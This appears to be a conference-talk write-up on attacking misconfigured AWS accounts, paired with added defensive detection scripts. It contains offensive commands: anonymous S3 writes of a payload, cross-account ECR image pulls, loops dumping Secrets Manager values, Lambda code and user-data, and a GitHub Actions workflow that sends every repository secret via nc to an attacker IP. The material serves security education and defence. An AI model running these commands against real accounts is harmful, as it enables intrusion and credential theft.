This post is the notes and commands from my presentation “The Cloud is Dark and Full of Terrors” from BSides Augusta 2021. Video is available on YouTube. Slides are available here.
Authorize global access via RDP to an instance (`--group-id` selects the security group to modify and `--protocol` is required alongside `--port`):
```bash
aws ec2 authorize-security-group-ingress --group-id $SECURITY_GROUP_ID --protocol tcp --port 3389 --cidr 0.0.0.0/0
```
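The flip side of that command is catching it when it happens in your own account. The script below is an added detection example, not part of the talk: it takes one CloudTrail record for `AuthorizeSecurityGroupIngress` (shape as CloudTrail writes it, with the `ipPermissions.items` list) and reports every world-open rule that covers a port on an assumed risky-port list. The sample event is constructed to mirror the command above; the account id, group id and user ARN are placeholders.

```python
import json
from ipaddress import ip_network

# Services that should essentially never be reachable from the whole internet
# (assumed list for this example; extend it to match your own baseline).
RISKY_PORTS = {22: "ssh", 3389: "rdp", 3306: "mysql", 5432: "postgres", 9200: "elasticsearch"}


def _is_world(cidr):
    """True for 0.0.0.0/0 and ::/0 (a prefix of length zero); malformed values are ignored."""
    try:
        return ip_network(cidr, strict=False).prefixlen == 0
    except ValueError:
        return False


def world_open_rules(event):
    """Findings for one CloudTrail record: every risky port the call opened to the whole internet.

    Returns a list of dicts (group, cidr, port, service, actor); an empty list for any
    other event name or when nothing risky was opened.
    """
    if event.get("eventName") != "AuthorizeSecurityGroupIngress":
        return []
    params = event.get("requestParameters") or {}
    group = params.get("groupId", "unknown")
    actor = (event.get("userIdentity") or {}).get("arn", "unknown")
    findings = []
    for perm in (params.get("ipPermissions") or {}).get("items", []):
        if perm.get("ipProtocol") == "-1":
            lo, hi = 0, 65535  # "all traffic": the record carries no port range
        else:
            lo, hi = perm.get("fromPort"), perm.get("toPort")
            if lo is None or hi is None:
                continue  # e.g. ICMP entries, which have no TCP/UDP port range
        cidrs = [r.get("cidrIp") for r in (perm.get("ipRanges") or {}).get("items", [])]
        cidrs += [r.get("cidrIpv6") for r in (perm.get("ipv6Ranges") or {}).get("items", [])]
        for cidr in cidrs:
            if not cidr or not _is_world(cidr):
                continue
            for port, service in RISKY_PORTS.items():
                if lo <= port <= hi:
                    findings.append({"group": group, "cidr": cidr, "port": port,
                                     "service": service, "actor": actor})
    return findings


# Constructed CloudTrail record shaped like the one the RDP command above produces; not a real log.
SAMPLE_EVENT = json.loads("""
{
  "eventVersion": "1.08",
  "eventSource": "ec2.amazonaws.com",
  "eventName": "AuthorizeSecurityGroupIngress",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/example-admin"},
  "requestParameters": {
    "groupId": "sg-0123456789abcdef0",
    "ipPermissions": {"items": [
      {"ipProtocol": "tcp", "fromPort": 3389, "toPort": 3389,
       "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]},
       "ipv6Ranges": {"items": [{"cidrIpv6": "::/0"}]}},
      {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443,
       "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}
    ]}
  }
}
""")

if __name__ == "__main__":
    for f in world_open_rules(SAMPLE_EVENT):
        print(f"ALERT {f['service']}/{f['port']} opened to {f['cidr']} on {f['group']} by {f['actor']}")
```

Run against the sample it reports RDP twice (once for the IPv4 and once for the IPv6 any-address range) and ignores the HTTPS rule; feed it records from a CloudTrail-to-S3 export or an EventBridge rule and it becomes a near-real-time alert for the misconfiguration the talk opens with.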
AWS S3 commands
Anonymous list of an S3 bucket:
```bash
aws s3 ls $bucket --no-sign-request
curl http://$bucket.s3.amazonaws.com/
```
Listing an S3 bucket as any AWS customer:
```bash
aws s3 ls $bucket --profile EVILACCOUNT
```
Download a specific object:
```bash
curl https://$bucket.s3.amazonaws.com/$key
```
Anonymous write to a publicly writable bucket:
```bash
aws s3 cp --no-sign-request payload.js s3://$bucket/index.js
curl -X PUT -T "payload.js" \
  -H "Host: $bucket.s3.amazonaws.com" \
  -H "x-amz-acl:public-read" \
  "https://$bucket.s3.amazonaws.com/index.js"
```
Determine the AWS Account ID which owns a bucket
Find S3 websites you can take over:
```bash
LIST=`aws route53 list-hosted-zones --output text --query HostedZones[].Id`
for id in $LIST ; do
  aws route53 list-resource-record-sets --hosted-zone-id $id \
    --query "ResourceRecordSets[].[AliasTarget.DNSName,Name]" \
    --output text | grep s3
done
```
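The defender's version of that loop is to check your own zones for aliases whose bucket no longer exists, before someone else registers the name. This is an added example, not code from the talk. It works offline on the JSON that `aws route53 list-resource-record-sets --output json` and `aws s3api list-buckets --query Buckets[].Name` return; the record sets and bucket list below are constructed, and the hosted zone ids are placeholders. It relies on the fact that S3 website hosting only serves a bucket named exactly like the DNS record, so the record name is the bucket that must exist.

```python
import re

# Alias targets Route53 uses for S3 static website hosting, e.g. s3-website-us-east-1.amazonaws.com.
# or s3-website.ap-south-1.amazonaws.com. (both the hyphen and the dot form exist).
S3_WEBSITE_RE = re.compile(r"^s3-website[.-][a-z0-9-]+\.amazonaws\.com\.?$", re.IGNORECASE)


def dangling_s3_aliases(record_sets, owned_buckets):
    """Return record names (without the trailing dot) whose alias points at an S3 website
    endpoint but whose bucket is not in owned_buckets.

    S3 website hosting serves a bucket only when the bucket is named exactly like the DNS
    record, so the record name is the bucket name that has to be present in the account.
    """
    owned = {b.rstrip(".").lower() for b in owned_buckets}
    dangling = []
    for rr in record_sets:
        target = (rr.get("AliasTarget") or {}).get("DNSName", "")
        if not S3_WEBSITE_RE.match(target):
            continue  # not an S3 website alias (ELB, CloudFront, plain A/MX/CNAME ...)
        bucket = rr["Name"].rstrip(".").lower()
        if bucket not in owned:
            dangling.append(bucket)
    return dangling


# Constructed sample shaped like `aws route53 list-resource-record-sets --output json`.
SAMPLE_RECORDS = [
    {"Name": "www.example.com.", "Type": "A",
     "AliasTarget": {"HostedZoneId": "ZHOSTEDZONEPLACEHOLDER",
                     "DNSName": "s3-website-us-east-1.amazonaws.com.", "EvaluateTargetHealth": False}},
    {"Name": "old-promo.example.com.", "Type": "A",
     "AliasTarget": {"HostedZoneId": "ZHOSTEDZONEPLACEHOLDER",
                     "DNSName": "s3-website-us-east-1.amazonaws.com.", "EvaluateTargetHealth": False}},
    {"Name": "api.example.com.", "Type": "A",
     "AliasTarget": {"HostedZoneId": "ZHOSTEDZONEPLACEHOLDER",
                     "DNSName": "dualstack.example-alb.us-east-1.elb.amazonaws.com.",
                     "EvaluateTargetHealth": True}},
    {"Name": "mail.example.com.", "Type": "MX", "TTL": 300,
     "ResourceRecords": [{"Value": "10 mail.example.com."}]},
]
# Constructed result of `aws s3api list-buckets --query Buckets[].Name` for the same account.
SAMPLE_OWNED_BUCKETS = ["www.example.com", "logs-example-constructed"]

if __name__ == "__main__":
    for name in dangling_s3_aliases(SAMPLE_RECORDS, SAMPLE_OWNED_BUCKETS):
        print(f"DANGLING: {name} aliases an S3 website endpoint but no such bucket exists here")
```

On the sample only `old-promo.example.com` is reported: `www.example.com` has its bucket, the ALB alias is not an S3 target, and the MX record has no alias at all. Either delete the record or recreate the bucket in your own account; both close the takeover window.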
Public ECR Registry
To authenticate to a target AWS account from an attacker account:
```bash
ECRPASS=$(aws ecr get-login-password --profile $EVILACCOUNT )
echo $ECRPASS | docker login --username AWS --password-stdin $TARGETACCOUNTID.dkr.ecr.$REGION.amazonaws.com
```
Login is successful!
List images:
```bash
aws ecr list-images --repository-name melisandre --profile $EVILACCOUNT --registry-id $TARGETACCOUNTID
```
To exfiltrate the container for local inspection (`docker save` writes a tar archive; without `-o` it streams the archive to stdout):
```bash
docker save -o $IMAGE.tar $TARGETACCOUNTID.dkr.ecr.$REGION.amazonaws.com/$IMAGE
```
Policy to make an ECR public:
```json
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "allow public pull",
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["ecr:*"]
    }
  ]
}
```
Note that the Sid says "pull" but `ecr:*` grants every ECR action to everyone, push and delete included; a pull-only grant would list just `ecr:BatchGetImage`, `ecr:GetDownloadUrlForLayer` and `ecr:BatchCheckLayerAvailability`.
Command to apply the above policy:
```bash
aws ecr set-repository-policy --repository-name melisandre --policy-text file://ecr-policy.json
```
How to enumerate ECR policies:
```bash
aws ecr get-repository-policy --registry-id $TARGETACCOUNTID --repository-name melisandre --profile EVILACCOUNT
```
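Both the S3 bucket policies behind the anonymous read/write section and the ECR repository policy above are ordinary IAM resource policies, so one audit routine covers them. The script below is an added example, not from the talk: it flags every Allow statement whose principal is everyone (`"*"` or `{"AWS": "*"}`), marks statements that carry a Condition as "conditional" rather than "public" (a `aws:SourceVpce` or similar condition may genuinely narrow them), and lists which granted actions go beyond what a deliberately public bucket or registry needs. The list of acceptable public-read actions is an assumption of this example; the bucket policy and account id are constructed, while the ECR policy is the one from the post.

```python
import json

# Actions a deliberately public S3 website bucket or public ECR registry actually needs.
# Anything else granted to everyone is reported as going beyond read (assumed list, not from the talk).
PUBLIC_READ_ACTIONS = {
    "s3:GetObject",
    "ecr:BatchGetImage", "ecr:GetDownloadUrlForLayer", "ecr:BatchCheckLayerAvailability",
}


def _as_list(value):
    """IAM lets Statement, Action and Principal.AWS be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_everyone(principal):
    """True for Principal "*" or {"AWS": "*"} (possibly inside a list): anonymous or any account."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def public_statements(policy):
    """Return one finding per Allow statement whose principal is everyone.

    'scope' is "conditional" when the statement has a Condition block (review it by hand) and
    "public" otherwise. 'beyond_read' lists granted actions outside PUBLIC_READ_ACTIONS;
    wildcards such as ecr:* or s3:* always land there.
    """
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _principal_is_everyone(stmt.get("Principal")):
            continue
        actions = _as_list(stmt.get("Action"))
        findings.append({
            "sid": stmt.get("Sid", "<no Sid>"),
            "scope": "conditional" if stmt.get("Condition") else "public",
            "actions": actions,
            "beyond_read": [a for a in actions if a not in PUBLIC_READ_ACTIONS],
        })
    return findings


# The repository policy from the post, as returned by `aws ecr get-repository-policy`.
ECR_POLICY = json.loads("""
{
  "Version": "2008-10-17",
  "Statement": [
    {"Sid": "allow public pull", "Effect": "Allow", "Principal": "*", "Action": ["ecr:*"]}
  ]
}
""")

# Constructed bucket policy: a legitimate public-read statement, a public-write one, and a
# statement scoped to a single (placeholder) account that should not be reported.
BUCKET_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket-constructed/*"},
    {"Sid": "PublicWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:PutObject", "s3:PutObjectAcl"],
     "Resource": "arn:aws:s3:::example-bucket-constructed/*"},
    {"Sid": "TeamOnly", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket-constructed/*"}
  ]
}
""")

if __name__ == "__main__":
    for name, policy in (("ecr-policy.json", ECR_POLICY), ("bucket-policy.json", BUCKET_POLICY)):
        for f in public_statements(policy):
            print(f"{name}: {f['sid']} is {f['scope']}; beyond read: {f['beyond_read'] or 'nothing'}")
```

Point it at the output of `aws ecr get-repository-policy`, `aws s3api get-bucket-policy` (the `Policy` field is a JSON string, so `json.loads` it twice) and you have the inventory of everything in the account that the talk's anonymous and EVILACCOUNT commands would succeed against.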
Public AWS Elasticsearch Clusters
Elasticsearch endpoints look like:
```
https://$CUSTOMERDEFINED-$RANDOM.us-east-1.es.amazonaws.com/
```
From an ES perspective, you can curl the endpoint and see if it responds:
```bash
curl https://$ENDPOINT/ | jq .
```
```json
{ ...
  "tagline" : "You Know, for Search"
}
```
Next, get the list of indices to see if anything bad looks like it’s there:
```bash
curl "https://$ENDPOINT/_aliases?pretty=true"
```
Finally, based on that list, you can search an index (drop the `$INDEX/` path segment to search across every index):
```bash
curl "https://$ENDPOINT/$INDEX/_search?pretty=true"
```
Enumerate Snapshots and AMIs
```bash
aws ec2 describe-snapshots --owner-ids $TARGETACCOUNTID --profile $EVILACCOUNT --region $REGION
aws ec2 describe-images --owners $TARGETACCOUNTID --profile $EVILACCOUNT --region $REGION
```
Secrets Enumeration – EC2 UserData
```bash
LIST=`aws ec2 describe-instances \
  --query Reservations[].Instances[].InstanceId --output text`
for i in $LIST ; do
  aws ec2 describe-instance-attribute --instance-id $i --attribute userData \
    --output text --query UserData | base64 --decode > $i-USERDATA.txt
done
```
Secrets Enumeration – Secrets Manager
```bash
LIST=`aws secretsmanager list-secrets \
  --query SecretList[].Name --output text`
for secret_name in $LIST; do
  echo "$secret_name: "
  aws secretsmanager get-secret-value --secret-id $secret_name --query SecretString --output text
done
```
Exfiltrate Lambda Code
```bash
LIST=`aws lambda list-functions --query Functions[].FunctionName --output text`
for f in $LIST ; do
  URL=`aws lambda get-function --function-name $f --output text --query Code.Location `
  curl -o $f.zip "$URL"
done
```
Find Secrets in Lambda Envars!!
```bash
LIST=`aws lambda list-functions --query Functions[].FunctionName --output text`
for f in $LIST ; do
  aws lambda get-function --function-name $f --query Configuration.Environment
done
```
Secrets Enumeration – CloudFormation
```bash
aws cloudformation describe-stacks --query Stacks[].Parameters
aws cloudformation describe-stacks --query Stacks[].Outputs
```
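The user-data, Lambda environment and CloudFormation dumps from the last four sections are plain text once decoded, and the point for a defender is to run the same enumeration against your own account and grep the output before anyone else does. The scanner below is an added example rather than anything from the talk: it runs a small set of assumed patterns (AWS access key ids, `aws_secret_access_key` assignments, generic `password=`/`token:`-style assignments and PEM private-key headers) over such a dump, line by line, and redacts what it finds so the report does not become a second leak. The user-data and Lambda environment samples are constructed; the key pair in them is the placeholder pair from AWS's own documentation, not a live credential.

```python
import re

# Patterns for material that should never sit in user-data, Lambda environment variables or
# CloudFormation parameters (assumed set for this example; tune it to your own estate).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_key_assignment": re.compile(
        r"(?i)aws_secret_access_key[\"']?\s*[=:]\s*[\"']?[A-Za-z0-9/+=]{40}"),
    "generic_credential": re.compile(
        r"(?i)(?:password|passwd|pwd|secret|token|api_?key)[\"']?\s*[=:]\s*[\"']?[^\s\"',]{8,}"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
}


def _redact(s):
    """Keep only the first four and last two characters so the report itself is safe to share."""
    if len(s) <= 8:
        return "*" * len(s)
    return s[:4] + "*" * (len(s) - 6) + s[-2:]


def find_secrets(text, source="<inline>"):
    """Scan one decoded dump and return findings as dicts (source, line, kind, preview).

    Findings are ordered by line, then by pattern order in PATTERNS; the preview is redacted.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                findings.append({"source": source, "line": lineno, "kind": kind,
                                 "preview": _redact(m.group(0))})
    return findings


# Constructed user-data, as `base64 --decode` would leave it in $i-USERDATA.txt. The access key
# and secret are the documentation placeholders AWS publishes, not real credentials.
SAMPLE_USERDATA = """\
#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
yum install -y httpd
echo "DB_PASSWORD=S3cr3tP@ssw0rd!" >> /etc/app.env
"""

# Constructed output of `aws lambda get-function --query Configuration.Environment`.
SAMPLE_LAMBDA_ENV = ('{"Variables": {"DB_HOST": "db.internal", "DB_PASSWORD": "hunter2hunter2", '
                     '"API_KEY": "sk_live_constructed_0123456789"}}')

if __name__ == "__main__":
    for f in find_secrets(SAMPLE_USERDATA, "i-0123456789abcdef0-USERDATA.txt"):
        print(f"{f['source']}:{f['line']} {f['kind']}: {f['preview']}")
    for f in find_secrets(SAMPLE_LAMBDA_ENV, "lambda:example-function"):
        print(f"{f['source']}:{f['line']} {f['kind']}: {f['preview']}")
```

Wire it up as `for f in *-USERDATA.txt; do python3 scan.py "$f"; done` (or call `find_secrets` on each file) and anything it reports belongs in Secrets Manager or SSM Parameter Store, fetched at boot by the instance role, not baked into user-data that any principal with `ec2:DescribeInstanceAttribute` can read.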
Exfiltrate secrets from GitHub Secrets
```yaml
name: Action run on a PR
on: [push]
jobs:
  sync-files:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
      - name: Exposure
        run: |
          echo "here are some sekrets haxored courtesy of $GITHUB_ACTOR: ${{ toJson(secrets) }}" | nc -w 3 <your_ip> 80
```
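What makes that workflow work is the `${{ toJson(secrets) }}` expression, which serialises every secret the job can see; a review of `.github/workflows/*.yml` on pull requests should catch it before it merges. The script below is an added example, not part of the talk: a dependency-free line scanner that flags `toJson(secrets)` anywhere in a workflow and, separately, any individual `${{ secrets.NAME }}` interpolated straight into a `run:` script (where it lands in the shell's argv and trace output) rather than passed through `env:`. The block-scalar handling is a deliberately small approximation of YAML, and the sample workflow is constructed for the example.

```python
import re

# The whole-context dump the workflow above performs, in any step or expression.
WHOLE_CONTEXT_RE = re.compile(r"\$\{\{\s*toJSON\(\s*secrets\s*\)\s*\}\}", re.IGNORECASE)
# A single secret interpolated straight into a script body; the safer pattern is `env:`.
INLINE_SECRET_RE = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
# A `run:` key, either as a list item (`- run:`) or as a plain mapping key.
RUN_KEY_RE = re.compile(r"^(?:-\s+)?run:\s*(.*)$")


def audit_workflow(text):
    """Return findings (line, kind, detail) for one GitHub Actions workflow file.

    Tracks `run: |` / `run: >` block scalars by indentation so that only script lines are
    checked for inline secrets; toJSON(secrets) is reported wherever it appears.
    """
    findings = []
    in_run, run_col = False, 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        stripped = raw.strip()
        indent = len(raw) - len(raw.lstrip())
        if WHOLE_CONTEXT_RE.search(raw):
            findings.append({"line": lineno, "kind": "entire_secrets_context", "detail": "toJSON(secrets)"})
        if in_run and stripped and indent <= run_col:
            in_run = False  # back at or above the column of the `run` key: block scalar ended
        script = None
        m = RUN_KEY_RE.match(stripped)
        if m:
            rest = m.group(1)
            if rest.startswith(("|", ">")):
                in_run = True
                # Column of the `run` key itself; for `- run: |` that is two past the dash.
                run_col = indent + (2 if stripped.startswith("-") else 0)
            else:
                script = rest  # single-line `run: some command`
        elif in_run:
            script = stripped
        if script:
            for sm in INLINE_SECRET_RE.finditer(script):
                findings.append({"line": lineno, "kind": "secret_interpolated_in_run", "detail": sm.group(1)})
    return findings


# Constructed workflow: the dump from the post (without the network send), an inline token,
# and the same token passed the safe way via env:.
SAMPLE_WORKFLOW = """\
name: Action run on a PR
on: [push]
jobs:
  sync-files:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
      - name: Exposure
        run: |
          echo "dumping everything: ${{ toJson(secrets) }}"
      - name: Inline token
        run: ./deploy.sh --token ${{ secrets.DEPLOY_TOKEN }}
      - name: Token via env
        env:
          DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
        run: ./deploy.sh
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {f['line']}: {f['kind']} ({f['detail']})")
```

On the sample it reports line 10 (the whole-context dump) and line 12 (`DEPLOY_TOKEN` inline in a script) and stays quiet about the `env:` form on lines 15 and 16. Running it as a required check on workflow changes, together with restricting which secrets are available to workflows triggered from forks, removes the easy version of this exfiltration.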